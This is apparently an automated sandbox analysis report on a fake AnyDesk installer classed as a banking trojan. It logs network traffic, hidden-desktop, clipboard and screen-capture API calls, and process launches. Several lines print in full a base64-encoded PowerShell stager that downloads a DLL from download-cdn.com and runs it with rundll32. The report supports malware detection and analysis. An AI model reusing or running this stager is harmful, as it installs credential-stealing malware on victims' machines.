      Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
      Source: unknownDNS traffic detected: queries for: download-cdn.com
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100017A0 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,VirtualAlloc,VirtualFree,InternetReadFile,VirtualFree,VirtualFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_100017A0
      Source: global trafficHTTP traffic detected: GET /download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msi HTTP/1.1Host: download-cdn.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /pload/26b30163 HTTP/1.1Host: download-cdn.comCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.123
      Source: unknownHTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49696 version: TLS 1.2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A05CE0 htons,socket,connect,closesocket,send,send,GetKeyboardLayoutList,send,CreateThread,WindowFromPoint,WindowFromPoint,GetParent,SendMessageTimeoutA,GetWindowRect,GetWindowLongA,GetParent,ScreenToClient,MoveWindow,SetFocus,PostMessageA,GetWindowLongA,GetParent,GetWindowLongA,GetParent,IsWindow,GetWindowPlacement,PostMessageW,PostMessageW,WindowFromPoint,GetWindowThreadProcessId,GetKeyboardLayout,ActivateKeyboardLayout,VkKeyScanExA,GetKeyboardState,ToAscii,ScreenToClient,ChildWindowFromPoint,ScreenToClient,ChildWindowFromPoint,PostMessageA,WindowFromPoint,7_2_04A05CE0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A04BA2 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_04A04BA2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A04E78 LocalAlloc,OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,lstrlenW,GlobalUnlock,CloseClipboard,7_2_04A04E78
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A0A850 GetDC,GetDC,CreateCompatibleDC,SelectObject,SelectObject,CreateCompatibleBitmap,SelectObject,SelectObject,CreateSolidBrush,SelectObject,Rectangle,GetDC,BitBlt,GetTopWindow,GetWindow,GetWindow,IsWindowVisible,GetWindowRect,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,PrintWindow,BitBlt,DeleteObject,DeleteDC,GetWindow,GetClassNameW,lstrcmpW,GetWindowLongA,SetWindowLongA,GetWindow,SelectObject,Rectangle,VirtualFree,VirtualFree,VirtualFree,VirtualAlloc,GetDC,VirtualAlloc,GetDC,VirtualAlloc,GetDC,VirtualAlloc,GetDIBits,7_2_04A0A850

      E-Banking Fraud

      barindex
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A0ACE0 OpenDesktopW,CreateDesktopW,SetThreadDesktop,7_2_04A0ACE0

      System Summary

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\435f8fae.datJump to dropped file
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D5EC03_2_00007FF7AF6D5EC0
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7150CC3_2_00007FF7AF7150CC
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7200183_2_00007FF7AF720018
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6EC8D03_2_00007FF7AF6EC8D0
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF71A8643_2_00007FF7AF71A864
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E209C3_2_00007FF7AF6E209C
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF718FF83_2_00007FF7AF718FF8
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6F870C3_2_00007FF7AF6F870C
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF720DB43_2_00007FF7AF720DB4
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E55743_2_00007FF7AF6E5574
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7155C43_2_00007FF7AF7155C4
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7256043_2_00007FF7AF725604
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E66063_2_00007FF7AF6E6606
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7115783_2_00007FF7AF711578
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E7C4C3_2_00007FF7AF6E7C4C
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7174E03_2_00007FF7AF7174E0
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E44443_2_00007FF7AF6E4444
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7134243_2_00007FF7AF713424
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E33303_2_00007FF7AF6E3330
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D7B303_2_00007FF7AF6D7B30
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E93FC3_2_00007FF7AF6E93FC
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7253883_2_00007FF7AF725388
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6DCA703_2_00007FF7AF6DCA70
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6F7A643_2_00007FF7AF6F7A64
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7111A43_2_00007FF7AF7111A4
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF71194C3_2_00007FF7AF71194C
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF71B9943_2_00007FF7AF71B994
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF815F80D814_2_00007FF815F80D81
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF815F80DAA4_2_00007FF815F80DAA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF815F80CA84_2_00007FF815F80CA8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026B07_2_100026B0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A09AC07_2_04A09AC0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A0DF707_2_04A0DF70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A0B9787_2_04A0B978
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A0D54F7_2_04A0D54F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC9AC09_2_00FC9AC0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FCB9789_2_00FCB978
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FCDF709_2_00FCDF70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FCD54F9_2_00FCD54F
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI4755.tmpJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4641a8.msiJump to behavior
      Source: AnydeskSetup_26b30163.msiBinary or memory string: OriginalFilenameviewer.exeF vs AnydeskSetup_26b30163.msi
      Source: AnydeskSetup_26b30163.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs AnydeskSetup_26b30163.msi
      Source: AnydeskSetup_26b30163.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs AnydeskSetup_26b30163.msi
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\LitesoftJump to behavior
      Source: classification engineClassification label: mal100.bank.troj.evad.winMSI@18/31@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D2680 LoadResource,LockResource,SizeofResource,3_2_00007FF7AF6D2680
      Source: C:\Windows\Installer\MSI5344.tmpKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi"
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc 